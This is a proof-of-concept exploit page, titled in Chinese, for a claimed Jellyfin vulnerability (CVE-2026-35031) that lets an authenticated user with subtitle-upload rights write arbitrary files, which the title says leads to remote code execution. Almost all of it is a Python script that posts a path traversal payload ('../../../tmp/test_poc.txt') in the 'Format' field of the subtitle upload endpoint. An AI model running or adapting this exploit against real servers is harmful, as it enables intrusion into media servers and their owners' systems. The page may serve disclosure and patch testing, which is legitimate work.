CVE-2026-35031 Jellyfin 任意文件写入致RCE漏洞

# PoC for CVE-2026-35031: Jellyfin Arbitrary File Write # This script demonstrates the path traversal vulnerability in the subtitle upload endpoint. # Note: Requires authentication and "Upload Subtitles" permission. import requests target_url = "http://target-jellyfin-server:8096" item_id = "VALID_MEDIA_ITEM_ID" # A valid media item ID on the server api_key = "USER_API_KEY" # Valid API key or session token traversal_payload = "../../../tmp/test_poc.txt" # Path traversal payload headers = { "Authorization": f"MediaBrowser Token={api_key}", "X-Emby-Token": f"{api_key}" } # Step 1: Upload arbitrary file via path traversal upload_url = f"{target_url}/Videos/{item_id}/Subtitles" data = { "Format": traversal_payload # Vulnerable parameter } files = { "Language": (None, "eng"), "Data": ("test.txt", b"Malicious content for arbitrary write") } response = requests.post(upload_url, headers=headers, data=data, files=files) if response.status_code == 204: print("[+] Arbitrary file write successful.") else: print(f"[-] Upload failed: {response.status_code}")